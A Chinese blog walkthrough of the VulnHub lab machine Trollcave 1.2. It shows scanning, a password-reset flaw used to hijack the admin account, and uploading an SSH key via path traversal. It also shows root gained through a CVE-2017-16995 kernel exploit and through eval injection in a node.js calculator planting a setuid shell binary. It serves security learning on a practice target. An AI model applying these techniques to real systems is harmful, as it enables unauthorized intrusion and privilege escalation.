IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> vulnhub靶机 trollcave-v1-2 -> 正文阅读

[系统运维]vulnhub靶机 trollcave-v1-2

vulnhub靶机 trollcave-v1-2

靶机地址Trollcave: 1.2 ~ VulnHub

目标为 root用户的flag.txt

靶机配置

靶机网卡配置参考我之前的vulnhub靶机 Os-hackNos-1_witwitwiter的博客-CSDN博客

渗透测试

使用nmap进行端口扫描

└─# nmap -sV 192.168.5.136                                                        
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 09:22 CST
Nmap scan report for 192.168.5.136 (192.168.5.136)
Host is up (0.00029s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.10.3 (Ubuntu)
MAC Address: 00:0C:29:92:E4:A8 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds

发现80端口

然后接着使用drisearch进行目录扫描

└─# dirsearch -u "http://192.168.5.136/"

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877

Output File: /root/.dirsearch/reports/192.168.5.136/_21-09-02_21-14-34.txt

Error Log: /root/.dirsearch/logs/errors-21-09-02_21-14-34.log

Target: http://192.168.5.136/

[21:14:34] Starting: 
[21:14:38] 200 -    2KB - /404                                                                                                                     
[21:14:38] 200 -    2KB - /404.html            
[21:14:38] 200 -    1KB - /500                 
[21:14:42] 302 -   92B  - /admin  ->  http://192.168.5.136/login                                                 
[21:14:42] 302 -   92B  - /admin.aspx  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.jsp  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.conf  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.cgi  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.php  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.js  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.asp  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.cfm  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.dll  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.dat  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.html  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.htm  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.exe  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.ex  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.do  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.old  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.epc  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.mdb  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.passwd  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.py  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.php3  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.pl  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.mvc  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.woa  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.rb  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin/  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.shtml  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin/?/login  ->  http://192.168.5.136/login
[21:14:42] 302 -   92B  - /admin.srf  ->  http://192.168.5.136/login
[21:14:49] 302 -   92B  - /comments  ->  http://192.168.5.136/login                                                           
[21:14:51] 200 -    0B  - /favicon.ico                                                        
[21:14:55] 200 -    2KB - /login.jsp                                                                                             
[21:14:55] 200 -    2KB - /login.php
[21:14:55] 200 -    2KB - /login.aspx
[21:14:55] 200 -    2KB - /login
[21:14:55] 200 -    2KB - /login.asp
[21:14:55] 200 -    2KB - /login.html
[21:14:55] 200 -    2KB - /login.cgi
[21:14:55] 200 -    2KB - /login.pl
[21:14:55] 200 -  707B  - /login.js
[21:14:55] 500 -   48B  - /login.json
[21:14:55] 200 -    2KB - /login.py
[21:14:55] 200 -    2KB - /login.rb
[21:14:55] 200 -    2KB - /login.htm               
[21:14:55] 200 -    2KB - /login.shtml              
[21:14:55] 200 -    2KB - /login.srf                        
[21:14:55] 200 -    2KB - /login.wdm%20              
[21:14:55] 200 -    2KB - /login/                     
[21:14:59] 302 -   87B  - /register.html  ->  http://192.168.5.136/                                        
[21:14:59] 302 -   87B  - /register.jsp  ->  http://192.168.5.136/
[21:14:59] 302 -   87B  - /register  ->  http://192.168.5.136/
[21:14:59] 302 -   87B  - /register.js  ->  http://192.168.5.136/                                           
[21:14:59] 302 -   87B  - /register.aspx  ->  http://192.168.5.136/
[21:14:59] 302 -   87B  - /register.php  ->  http://192.168.5.136/
[21:14:59] 302 -   92B  - /reports  ->  http://192.168.5.136/login         
[21:14:59] 200 -  202B  - /robots.txt                             
[21:15:02] 302 -   92B  - /users.js  ->  http://192.168.5.136/login                                                           
[21:15:03] 302 -   92B  - /users.csv  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.html  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.aspx  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.php  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.ini  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.jsp  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.mdb  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.json  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.db  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.sqlite  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.sql  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.pwd  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.log  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.xls  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users/  ->  http://192.168.5.136/login
[21:15:03] 302 -   92B  - /users.txt  ->  http://192.168.5.136/login
                                                                                                            
Task Completed

可以看到有php环境和jsp环境,那么尝试访问login

请添加图片描述

一个登陆界面,旁边发现了最新的用户,以及在线用户,点击用户可以发现URL中最后多了一个数字,点击几次后,发现最新的用户是17,那么可以遍历1~17,得到所有用户的信息

请添加图片描述

King:Superadmin
dave:Admin
dragon:Admin
coderguy:Admin
cooldude89:Moderator
Sir:Moderator
Q:Moderator
teflon:Moderator
TheDankMan:Regular member
artemus:Regular member
MrPotatoHead:Regular member
Ian:Regular member
kev:Member
notanother:Member
anybodyhome:Member
onlyme:Member
xer:Member

可以到有一个Superadmin用户。

查询各种资料得到https://github.com/rails/rails

安装的时候会创建用户 rails,网站里还有一个重置密码的功能http://192.168.5.136/password_resets/new

直接选择重置king用户会报错,选择重置xer用户会得到如下链接http://192.168.5.136/password_resets/edit.bdmbrG8YFz37cb8GU-2fgA?name=xer

我们访问这个链接即可重置xer的密码

请添加图片描述

但我们尝试将http://192.168.5.136/password_resets/edit.bdmbrG8YFz37cb8GU-2fgA?name=xer改为http://192.168.5.136/password_resets/edit.bdmbrG8YFz37cb8GU-2fgA?name=King尝试利用逻辑错误重置king用户的密码

发现可以直接重置

进入之后,在file manager上传文件时,发现不能上传,在admin panel中发现可以开启上传

请添加图片描述

用哥斯拉生成jsp木马,上传至服务器,访问后发现没有解析

请添加图片描述

那么尝试上传ssh秘钥

首先生成ssh秘钥

ssh-keygen -f rails
mv rails.pub authorized_keys

将他上传到/home/rails/.ssh/
上传时要利用../../../../../跳转到根目录,故上传路径为../../../../../../../home/rails/.ssh/authorized_keys
然后进行ssh登录

mv rails id_rsa-rails chmod 600 id_rsa-rails
ssh -i id_rsa-rails rails@192.168.5.136

获取权限后查看系统信息

$ uname -a
Linux trollcave 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"

CVE-2017-16995提权

搜索到exphttps://www.exploit-db.com/exploits/45010

gcc cve.c -o cve

上传至服务器后

$ chmod 777 cve
$ ./cve
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88002b580900
[*] Leaking sock struct from ffff880028f0e000
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88002f01b900
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff88002f01b900
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),1001(rails)
# cat /root/flag.txt
et tu, dragon?

c0db34ce8adaa7c07d064cc1697e3d7cb8aec9d5a0c4809d5a0c4809b6be23044d15379c5

利用suid提权

首先切换为bash,然后使用netstat -natpl查看端口

rails@trollcave:~$ netstat -natpl
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:3000            0.0.0.0:*               LISTEN      1065/ruby2.3    
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:55716         127.0.0.1:80            ESTABLISHED 1450/ruby       
tcp        0      0 127.0.0.1:55714         127.0.0.1:80            TIME_WAIT   -               
tcp        0      0 127.0.0.1:55744         127.0.0.1:80            TIME_WAIT   -               
tcp        0      0 127.0.0.1:55728         127.0.0.1:80            TIME_WAIT   -               
tcp        0      0 127.0.0.1:3000          127.0.0.1:55960         TIME_WAIT   -               
tcp        0      0 127.0.0.1:55720         127.0.0.1:80            TIME_WAIT   -               
tcp        0      0 127.0.0.1:3000          127.0.0.1:55950         TIME_WAIT   -               
tcp        0      0 127.0.0.1:55724         127.0.0.1:80            TIME_WAIT   -               
tcp        0      0 192.168.5.136:60830     91.189.91.38:80         ESTABLISHED -               
tcp        0      0 127.0.0.1:55958         127.0.0.1:3000          TIME_WAIT   -               
tcp        0      0 127.0.0.1:3000          127.0.0.1:55946         TIME_WAIT   -               
tcp        0      0 127.0.0.1:55962         127.0.0.1:3000          TIME_WAIT   -               
tcp        0      0 192.168.5.136:22        192.168.5.129:45382     ESTABLISHED -               
tcp        0      0 127.0.0.1:55968         127.0.0.1:3000          TIME_WAIT   -               
tcp        0      0 127.0.0.1:55954         127.0.0.1:3000          TIME_WAIT   -               
tcp        0      0 127.0.0.1:55682         127.0.0.1:80            TIME_WAIT   -               
tcp        0      0 192.168.5.136:58824     91.189.91.38:80         CLOSE_WAIT  -               
tcp        0      0 127.0.0.1:3000          127.0.0.1:55974         TIME_WAIT   -               
tcp        0      0 127.0.0.1:55738         127.0.0.1:80            TIME_WAIT   -               
tcp        0      0 127.0.0.1:80            127.0.0.1:55716         ESTABLISHED -               
tcp        0      0 127.0.0.1:55964         127.0.0.1:3000          TIME_WAIT   -               
tcp        0      0 127.0.0.1:55970         127.0.0.1:3000          TIME_WAIT   -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 ::1:5432                :::*                    LISTEN      -               
tcp6       0      0 ::1:50978               ::1:5432                ESTABLISHED 1065/ruby2.3    
tcp6       0      0 ::1:51680               ::1:5432                ESTABLISHED 1065/ruby2.3    
tcp6       0      0 ::1:5432                ::1:51680               ESTABLISHED -               
tcp6       0      0 ::1:51666               ::1:5432                ESTABLISHED 1065/ruby2.3    
tcp6       0      0 ::1:51678               ::1:5432                ESTABLISHED 1065/ruby2.3    
tcp6       0      0 ::1:51682               ::1:5432                ESTABLISHED 1065/ruby2.3    
tcp6       0      0 ::1:5432                ::1:51682               ESTABLISHED -               
tcp6       0      0 ::1:5432                ::1:51666               ESTABLISHED -               
tcp6       0      0 ::1:5432                ::1:51678               ESTABLISHED -               
tcp6       0      0 ::1:5432                ::1:50978               ESTABLISHED - 

使用Shift + ~ +C切换到ssh,然后使用-L 8888:LOCALHOST:8888将8888端口转发至本地

请添加图片描述

使用find / -name calc -print 2>&1| grep -v "Permission denied"查找calc

rails@trollcave:~$ find / -name calc -print 2>&1| grep -v "Permission denied"
/usr/src/linux-headers-4.4.0-116-generic/include/config/can/calc
/usr/src/linux-headers-4.4.0-97-generic/include/config/can/calc
/home/king/calc

查看calc,发现里面有个calc.js,其中的内容为

rails@trollcave:~$ cat /home/king/calc/calc.js 
var http = require("http");
var url = require("url");
var sys = require('sys');
var exec = require('child_process').exec;//此处有命令执行漏洞

// Start server
function start(route)
{
        function onRequest(request, response)
        {
                var theurl = url.parse(request.url);
                var pathname = theurl.pathname;
                var query = theurl.query; 
                console.log("Request for " + pathname + query + " received.");
                route(pathname, request, query, response);
        }

http.createServer(onRequest).listen(8888, '127.0.0.1');
console.log("Server started");
}

// Route request
function route(pathname, request, query, response)
{
        console.log("About to route request for " + pathname);
        switch (pathname)
        {
                // security risk
                /*case "/ping":
                        pingit(pathname, request, query, response);
                        break;  */

                case "/":
                        home(pathname, request, query, response);
                        break;

                case "/calc":
                        calc(pathname, request, query, response);
                        break;

                default:
                        console.log("404");
                        display_404(pathname, request, response);
                        break;
        }
}

function home(pathname, request, query, response)
{
        response.end("<h1>The King's Calculator</h1>" +
                        "<p>Enter your calculation below:</p>" +
                        "<form action='/calc' method='get'>" +
                                "<input type='text' name='sum' value='1+1'>" +
                                "<input type='submit' value='Calculate!'>" +
                        "</form>" +
                        "<hr style='margin-top:50%'>" +
                        "<small><i>Powered by node.js</i></small>"
                        );
}

function calc(pathname, request, query, response)
{
        sum = query.split('=')[1];
        console.log(sum)
        response.writeHead(200, {"Content-Type": "text/plain"});

        response.end(eval(sum).toString());//此处执行了eval
}

function ping(pathname, request, query, response)
{
        ip = query.split('=')[1];
        console.log(ip)
        response.writeHead(200, {"Content-Type": "text/plain"});

        exec("ping -c4 " + ip, function(err, stdout, stderr) {
                response.end(stdout);
        });
}

function display_404(pathname, request, response)
{
        response.write("<h1>404 Not Found</h1>");
        response.end("I don't have that page, sorry!");
}

// Start the server and route the requests
start(route);
rails@trollcave:~$ 

经过审计得到var exec = require(‘child_process’).exec;//此处有命令执行漏洞

请添加图片描述

rails@trollcave:/tmp$ ls -al
total 56
drwxrwxrwt  9 root  root   4096 Sep  2 17:46 .
drwxr-xr-x 23 root  root   4096 Sep  2  2021 ..
drwxrwxrwt  2 root  root   4096 Sep  2  2021 .font-unix
drwxrwxrwt  2 root  root   4096 Sep  2  2021 .ICE-unix
-rw-r--r--  1 king  king      0 Sep  2 17:46 passwd
-rw-------  1 rails rails 16664 Sep  2 15:40 RackMultipart20210902-1065-1d715xb
drwx------  3 root  root   4096 Sep  2  2021 systemd-private-3102f8c2d65243ab854375d95f3f6255-systemd-timesyncd.service-yaMXNV
drwxrwxrwt  2 root  root   4096 Sep  2  2021 .Test-unix
drwx------  2 root  root   4096 Sep  2  2021 vmware-root
drwxrwxrwt  2 root  root   4096 Sep  2  2021 .X11-unix
drwxrwxrwt  2 root  root   4096 Sep  2  2021 .XIM-unix
rails@trollcave:/tmp$ cat passwd
rails@trollcave:/tmp$ 

发现是king用户创建的,但是里面没有内容

在/tmp目录下

创建一个1.sh,内容为

#!/bin/sh
touch /tmp/123.txt

chmod 755 1.sh

测试是否能够运行

请添加图片描述

rails@trollcave:/tmp$ ls
123.txt  1.sh  pass  passwd  RackMultipart20210902-1065-1d715xb  systemd-private-3102f8c2d65243ab854375d95f3f6255-systemd-timesyncd.service-yaMXNV  vmware-root

成功运行了touch命令

那么可以通过suid进行提权

查看King的uid和gid

rails@trollcave:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
king:x:1000:1000:King,,,:/home/king:/bin/bash
rails:x:1001:1001::/home/rails:
dragon:x:1002:1002:,,,:/home/dragon:/bin/bash
dave:x:1003:1003:,,,:/home/dave:/bin/bash
coderguy:x:1004:1004:,,,:/home/coderguy:/bin/bash

King的uid是1000 gid是1000

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc,char *argv[])
{
setreuid(1000,1000);
execve("/bin/bash",NULL,NULL);
}

gcc king.c -o king

然后将king上传至靶机/tmp

在1.sh中写入

#!/bin/sh
cp /tmp/king /home/king/exp
chmod 4755 /home/king/exp

使用burp运行1.sh

请添加图片描述

rails@trollcave:/tmp$ ls /home/king/
calc  exp

使用exp提权,成功提权到King

rails@trollcave:/home/king$ ./exp
king@trollcave:/home/king$ 

查询sudo权限,发现不需要密码

king@trollcave:/home/king$ sudo -l
Matching Defaults entries for king on trollcave:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User king may run the following commands on trollcave:
    (ALL) NOPASSWD: ALL

那么直接提权到root,获取flag

king@trollcave:/home/king$ sudo su -
root@trollcave:~# cat /root/flag.txt 
et tu, dragon?

c0db34ce8adaa7c07d064cc1697e3d7cb8aec9d5a0c4809d5a0c4809b6be23044d15379c5

注意事项

cve-2017-16995在虚拟机安装有故障的时候会提权失败。suid提权是需要对应权限的用户的命令。chmod 4755与chmod 755 的区别在于开头多了一位,这个4表示其他用户执行文件时,具有与所有者相当的权限。

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-09-04 17:57:06  更:2021-09-04 17:59:01 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/30 2:31:59-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码